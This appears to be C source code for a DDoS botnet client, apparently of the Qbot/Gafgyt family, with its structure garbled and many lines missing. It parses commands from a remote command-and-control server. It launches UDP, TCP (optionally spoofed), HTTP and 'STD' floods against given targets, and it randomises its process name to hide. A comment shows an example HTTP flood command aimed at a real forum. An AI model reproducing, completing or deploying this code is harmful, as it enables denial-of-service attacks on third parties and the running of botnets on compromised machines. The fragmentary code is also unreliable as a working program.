sendUDP(ip, port, time, spoofed, packetsize, pollinterval, sleepcheck, sleeptime);
if(!strcmp(argv[0], "TCP")) {
if(argc < 6 || atoi(argv[3]) == -1 || atoi(argv[2]) == -1 || atoi(argv[4]) == -1 || atoi(argv[4]) > 32 || (argc > 6 && atoi(argv[6]) < 0) || (argc == 8 && atoi(argv[7]) < 1)) {
unsigned char *ip = argv[1];
int port = atoi(argv[2]);
int time = atoi(argv[3]);
int spoofed = atoi(argv[4]);
unsigned char *flags = argv[5];
int pollinterval = argc == 8 ? atoi(argv[7]) : 10;
int psize = argc > 6 ? atoi(argv[6]) : 0;
if(strstr(ip, ",") != NULL) {
unsigned char *hi = strtok(ip, ",");
while(hi != NULL) {
if(!listFork()) {
sendTCP(hi, port, time, spoofed, flags, psize, pollinterval);
hi = strtok(NULL, ",");
} else {
if (!listFork()) {
sendTCP(ip, port, time, spoofed, flags, psize, pollinterval);
if (!strcmp(argv[0], "HTTP"))
// !* HTTP POST/GET/HEAD hackforums.net 80 / 10 100
if (argc < 6 || atoi(argv[3]) < 1 || atoi(argv[5]) < 1) return;
if (listFork()) return;
SendHTTP(argv[1], argv[2], atoi(argv[3]), argv[4], atoi(argv[5]), atoi(argv[6]));
if (!strcmp(argv[0], "HTTPHEX"))
if (argc < 6 || atoi(argv[3]) < 1 || atoi(argv[5]) < 1) return;
if (listFork()) return;
SendHTTPHex(argv[1], argv[2], atoi(argv[3]), argv[4], atoi(argv[5]), atoi(argv[6]));
if(!strcmp(argv[0], "STD")) //STD TARGET PORT TIME
if(argc < 4 || atoi(argv[2]) < 1 || atoi(argv[3]) < 1)
unsigned char *ip = argv[1];
int port = atoi(argv[2]);
int time = atoi(argv[3]);
if(strstr(ip, ",") != NULL)
unsigned char *hi = strtok(ip, ",");
while(hi != NULL)
sendSTD(hi, port, time);
hi = strtok(NULL, ",");
} else {
if (listFork()) { return; }
sendSTD(ip, port, time);
if(!strcmp(argv[0], "CLEAN"))
botnetPrint(KadenCommStock, "[Cleaning] [%s:%s]", getBuild(), getEndianness());
if(!strcmp(argv[0], "UPDATE"))
botnetPrint(KadenCommStock, "[Updating] [%s:%s]", getBuild(), getEndianness());
if(!strcmp(argv[0], "KILLATTK")) {
int killed = 0;
unsigned long i;
for (i = 0; i < numpids; i++) {
if (pids[i] != 0 && pids[i] != getpid()) {
kill(pids[i], 9);
int getOurIP() {
int sock = socket(AF_INET, SOCK_DGRAM, 0);
if(sock == -1) return 0;
struct sockaddr_in serv;
memset(&serv, 0, sizeof(serv));
serv.sin_family = AF_INET;
serv.sin_addr.s_addr = inet_addr("");
serv.sin_port = htons(53);
int err = connect(sock, (const struct sockaddr*) &serv, sizeof(serv));
if(err == -1) return 0;
struct sockaddr_in name;
socklen_t namelen = sizeof(name);
err = getsockname(sock, (struct sockaddr*) &name, &namelen);
if(err == -1) return 0;
ourIP.s_addr = name.sin_addr.s_addr;
int cmdline = open("/proc/net/route", O_RDONLY);
char linebuf[4096];
while(fdgets(linebuf, 4096, cmdline) != NULL) {
if(strstr(linebuf, "\t00000000\t") != NULL) {
unsigned char *pos = linebuf;
while(*pos != '\t') pos++;
*pos = 0;
memset(linebuf, 0, 4096);
if(*linebuf) {
int i;
struct ifreq ifr;
strcpy(ifr.ifr_name, linebuf);
ioctl(sock, SIOCGIFHWADDR, &ifr);
for (i=0; i<6; i++) macAddress[i] = ((unsigned char*)ifr.ifr_hwaddr.sa_data)[i];
int getEndianness(void)
uint32_t vlu;
uint8_t data[sizeof(uint32_t)];
} nmb;
nmb.data[0] = 0x00;
nmb.data[1] = 0x01;
nmb.data[2] = 0x02;
nmb.data[3] = 0x03;
switch (nmb.vlu)
case UINT32_C(0x00010203):
return "BIG_ENDIAN";
case UINT32_C(0x03020100):
case UINT32_C(0x02030001):
return "BIG_ENDIAN_W";
case UINT32_C(0x01000302):
return "UNKNOWN";
int initConnection() {
unsigned char server[4096];
memset(server, 0, 4096);
if(KadenCommStock) { close(KadenCommStock); KadenCommStock = 0; }
if(botnetServer + 1 == SERVER_LIST_SIZE) botnetServer = 0;
else botnetServer++;
strcpy(server, ServerInfo[botnetServer]);
int port = Server_Botport;
if(strchr(server, ':') != NULL) {
port = atoi(strchr(server, ':') + 1);
*((unsigned char *)(strchr(server, ':'))) = 0x0;
KadenCommStock = socket(AF_INET, SOCK_STREAM, 0);
if(!connectTimeout(KadenCommStock, server, port, 30)) return 1;
return 0;
int main(int argc, unsigned char *argv[]) {
char name_buf[32];
char id_buf[32];
int name_buf_len;
if(SERVER_LIST_SIZE <= 0) return 0;
name_buf_len = ((rand_next() % 4) + 3) * 4;
rand_alphastr(name_buf, name_buf_len);
name_buf[name_buf_len] = 0;
util_strcpy(argv[0], name_buf);
name_buf_len = ((rand_next() % 6) + 3) * 4;
rand_alphastr(name_buf, name_buf_len);
name_buf[name_buf_len] = 0;
prctl(PR_SET_NAME, name_buf);
srand(time(NULL) ^ getpid());
pid_t pid1;
pid_t pid2;
int status;
if (pid1 = fork()) {
waitpid(pid1, &status, 0);
} else if (!pid1) {
if (pid2 = fork()) {
} else if (!pid2) {
} else {
} else {
while(1) {
if(initConnection()) { continue; }
botnetPrint(KadenCommStock, "[ Execution ] [ %s ] \e[97mConnected -> %s | BUILD: %s | Endian: %s", getBuildz(), inet_ntoa(ourIP), getBuild(), getEndianness());
char commBuf[4096];
int got = 0;
int i = 0;
while((got = recvLine(KadenCommStock, commBuf, 4096)) != -1) {
for (i = 0; i < numpids; i++) if (waitpid(pids[i], NULL, WNOHANG) > 0) {
unsigned int *newpids, on;
for (on = i + 1; on < numpids; on++) pids[on-1] = pids[on];
pids[on - 1] = 0;
newpids = (unsigned int*)malloc((numpids + 1) * sizeof(unsigned int));
for (on = 0; on < numpids; on++) newpids[on] = pids[on];
pids = newpids;
commBuf[got] = 0x00;
unsigned char *message = commBuf;
if(*message == '!') {
unsigned char *nickMask = message + 1;
while(*nickMask != ' ' && *nickMask != 0x00) nickMask++;
if(*nickMask == 0x00) continue;
*(nickMask) = 0x00;
nickMask = message + 1;
message = message + strlen(nickMask) + 2;
while(message[strlen(message) - 1] == '\n' || message[strlen(message) - 1] == '\r') message[strlen(message) - 1] = 0x00;
unsigned char *command = message;
while(*message != ' ' && *message != 0x00) message++;
*message = 0x00;
unsigned char *tmpcommand = command;
while(*tmpcommand) { *tmpcommand = toupper(*tmpcommand); tmpcommand++; }
unsigned char *params[10];
int paramsCount = 1;
unsigned char *pch = strtok(message, " ");
params[0] = command;
while(pch) {
if(*pch != '\n') {
params[paramsCount] = (unsigned char *)malloc(strlen(pch) + 1);
memset(params[paramsCount], 0, strlen(pch) + 1);
strcpy(params[paramsCount], pch);
pch = strtok(NULL, " ");
processCmd(paramsCount, params);
if(paramsCount > 1) {
int q = 1;
for(q = 1; q < paramsCount; q++) {
return 0;